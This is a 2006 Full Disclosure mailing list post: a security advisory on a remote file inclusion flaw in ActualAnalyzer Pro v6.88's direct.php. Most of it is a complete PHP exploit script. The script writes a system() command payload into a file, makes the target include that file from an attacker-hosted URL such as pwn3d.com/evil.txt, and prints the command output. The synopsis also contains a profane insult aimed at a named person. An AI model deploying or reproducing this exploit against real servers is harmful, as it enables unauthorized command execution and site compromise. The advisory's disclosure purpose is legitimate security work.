Full Disclosure mailing list archives
[XPA] ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
From: wr0ck <wr0ck.lists () gmail com>
Date: Mon, 08 May 2006 11:26:09 -0400
=======================================================================================XOR Crew :: Security Advisory 4/10/2006
======================================================================================= ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability ======================================================================================= http://www.xorcrew.net/ http://www.xorcrew.net/ReZEN ======================================================================================= :: Summary Vendor : ActualScripts Vendor Site : http://www.actualscripts.com/ Product(s) : ActualAnalyzer Pro v6.88 Version(s) : All Severity : Medium/High Impact : Remote Command Execution Release Date : 4/10/2006 Credits : ReZEN (rezen (a) xorcrew (.) net) ======================================================================================= I. DescriptionPro Edition — the professional solution for medium and large business web sites. The ability to collect high detailed statistics about each separate page of web site will help you effectively manage the overall Internet strategy and direction of company,
successfully optimize and develop him. ======================================================================================= II. Synopsis FUCK YOU 'ASHTETICO' 0hday releasing wh0re.There is a remote file inclusion vulnerability that allows for remote command execution
in the /direct.php file. The bug is here on lines 5-8: if(!isset($rf)) $rf='./'; require $rf.'common/error.php'; require $rf.'common/global.php'; require $rf.'common/config.php'; require $rf.'common/dbaccess.php'; the $rf variable is not set prior to being used in the require() function. The vendor and support team have been contacted. ======================================================================================= Exploit code: -----BEGIN----- <?php /* ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/path to actualanalyzer/direct.php?rf= hurl: http://www.pwn3d.com/evil.txt? */ $cmd = $_POST["cmd"]; $turl = $_POST["turl"]; $hurl = $_POST["hurl"]; $form= "<form method=\"post\" action=\"".$PHP_SELF."\">"."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>" ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>" ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">" ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">"; if (!isset($_POST['submit'])) { echo $form; }else{ $file = fopen ("test.txt", "w+"); fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); system(\"echo ++END++\"); ?>"); fclose($file); $file = fopen ($turl.$hurl, "r"); if (!$file) { echo "<p>Unable to get output.\n"; exit; } echo $form; while (!feof ($file)) { $line .= fgets ($file, 1024)."<br>"; } $tpos1 = strpos($line, "++BEGIN++"); $tpos2 = strpos($line, "++END++"); $tpos1 = $tpos1+strlen("++BEGIN++"); $tpos2 = $tpos2-$tpos1; $output = substr($line, $tpos1, $tpos2); echo $output; } ?> ------END------ ======================================================================================= IV. Greets :> All of xor, Infinity, stokhli, ajax, gml, D2K ======================================================================================= _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [XPA] ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability wr0ck (May 08)